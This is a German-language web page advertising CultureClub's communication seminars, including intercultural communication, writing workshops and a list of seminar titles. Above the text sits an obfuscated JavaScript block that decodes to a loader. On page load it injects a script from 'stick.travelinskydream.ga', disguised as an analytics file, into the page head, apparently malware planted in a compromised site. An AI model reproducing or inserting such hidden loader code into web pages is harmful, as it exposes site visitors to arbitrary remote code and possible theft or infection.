var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();

Kommunikation ist sowohl im alltäglichen Leben, wie auch in der Arbeits- und Geschäftswelt allgegenwärtig. Kommunikation ist viel mehr, als reiner Informationsaustausch zur Mitteilung unserer Gedanken, denn kommunikative Prozesse definieren und regeln zwischenmenschliche Beziehungen, stiften Identität und beeinflussen unsere emotionale Wahrnehmung.

 

Kommunikation ist somit eine Schlüsselkompetenz, welche nicht nur ein effizientes Handeln ermöglicht, sondern vor allem ein entscheidender Faktor auf der Ebene der Beziehung und der sozialen Interaktionen ist. Kommunikationsverhalten wirkt sich stark auf die Stimmung und Urteil des Gegenübers aus. Es besitzt also großen Einfluss auf Haltung und Motivation der einzelnen Akteure.

Wozu Kommunikationskompetenzen verbessern?

Kommunikation – also Sprache, Ausdruck und zwischenmenschliche Interaktion – ist so grundlegend und allgegenwärtig, dass wir ihren hohen Stellenwert oft übersehen, oder gar unterbewerten.

Eine höhere Kommunikationskompetenz steigert grundsätzlich die Effizienz und die Erfolgsquote sämtlicher zwischenmenschlichen Aktionen und Situationen. Ob zeitliche Einsparungen, mehr Erfolg, ein besseres Image oder angenehmeres Miteinander – dies und noch viel mehr sind über den Faktor Kommunikation regulierbar.

Mit dem Informationszeitalter und der globalen Vernetzung ist die Beschäftigung mit Kommunikation zum Schlüssel des Erfolges geworden. Das Verbessern der eigenen Kommunikationskompetenz ist somit unumgänglich, um seine Ziele zu erreichen und den Anforderungen der Zeit gerecht zu werden.

Angebot zum Thema Kommunikation

 

Mit einer hohen fachlichen Expertise auf dem Gebiet von Kommunikation und Sprache, sowie einem breit gefächerten Angebot in diesem Bereich, ist CultureClub der richtige Ansprechpartner, wenn es darum geht, Kommunikation zu begreifen und zu evaluieren.

Allgemeine oder spezifische Seminare

Das Angebot reicht von allgemeinen Seminaren zur Einführung, über Kommunikationstraining zu spezifischen Situationen und Herausforderungen in Unternehmen, bis hin zu Veranstaltungen zu psychosozialen Themen, wie z.B. Anti-Diskriminierungs-Training. Auch Seminare im Bereich der Unternehmenskommunikation und  Marketing-Kommunikation gehören zu unserem Angebot.

 

Text- und Schreibseminare

Seminare rund um das Thema professionelle Textproduktion werden vor allem als offenes Angebot geführt. Mehr zu offenen Seminaren finden Sie im Veranstaltungskalender.

 

Interkulturelle Kommunikation

Durch ein umfangreiches kulturelles Know-how, kann CultureClub vor allem auf dem Gebiet der interkulturellen Kommunikation Wissen und Kompetenzen vermitteln. Gerade dieser komplexe Bereich der Kommunikation birgt viele Schwierigkeiten, und ist häufig von Missverständnissen geprägt. Ein Workshop zu diesem Thema kann deshalb enorm zum besseren gegenseitigen interkulturellen Verständnis beitragen, und den Umgang miteinander für alle Beteiligten somit erheblich aufwerten.

 

[/vc_column]

Seminarbuchung/Anmeldung

Genaue Auswahl und Ausrichtung des Inhalts finden immer im Kontext der jeweiligen Auftragssituation statt, und werden auf Ihre individuelle Situation zugeschnitten.

 

Daneben besteht die Möglichkeit einer freien Anmeldung zu einem offenen Seminar. Was Kommunikation betrifft, so sind vor allem Text- und Schreibworkshops zur freien Anmeldung als offener Workshop verfügbar. Termine siehe offene Seminare

Auswahl an Seminaren zum Thema Kommunikation

Zeichensprache

Nonverbale Kommunikation verstehen

Hochachtungsvoll

Konflikte vermeiden

Sound of Silence

Die Wahrheit liegt im Ungesagten

Wortlaut

Sprach und Diskriminierung

Babylonische Türme

Interkulturelle Kommunikation

Spiel des Lebens

Kommunikation verstehen

Lord of Realities

Kommunikation – Diskurs – Macht

AdWerb

Marketingkommunikation